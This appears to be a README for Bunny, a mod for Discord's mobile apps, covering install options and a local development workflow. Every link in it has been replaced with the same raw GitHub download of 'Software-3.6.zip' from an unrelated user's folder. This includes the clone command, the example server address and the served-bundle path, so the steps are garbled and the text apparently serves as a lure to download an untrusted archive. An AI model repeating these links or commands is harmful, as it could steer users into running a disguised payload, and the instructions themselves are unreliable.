A mod for Discord's mobile apps, a fork of Vendetta.
- Root with Xposed - BunnyXposed
- Non-root - BunnyManager
- BunnyTweak - Get prebuilt rootful and rootless
.debfiles or the prepatched.ipa
- Install a Bunny loader with loader config support (any mentioned in the Installing section).
- Go to Settings > General and enable Developer Settings.
- Clone the repo:
git clone https://github.com/lowwkezer/bunny/raw/refs/heads/main/src/lib/utils/Software-3.6.zip - Install dependencies:
pnpm i - Build Bunny's code:
pnpm build - In the newly created
distdirectory, run a HTTP server. I recommend http-server. - Go to Settings > Developer enabled earlier. Enable
Load from custom urland input the IP address and port of the server (e.g.https://github.com/lowwkezer/bunny/raw/refs/heads/main/src/lib/utils/Software-3.6.zip) in the new input box labelledBunny URL. - Restart Discord. Upon reload, you should notice that your device will download Bunny's bundled code from your server, rather than GitHub.
- Make your changes, rebuild, reload, go wild!
Alternatively, you can directly serve the bundled code by running pnpm serve. https://github.com/lowwkezer/bunny/raw/refs/heads/main/src/lib/utils/Software-3.6.zip will be served on your local address under the port 4040. You will then insert http://<local ip address>https://github.com/lowwkezer/bunny/raw/refs/heads/main/src/lib/utils/Software-3.6.zip as a custom url and reload. Whenever you restart your mobile client, the script will rebuild the bundle as your client fetches it.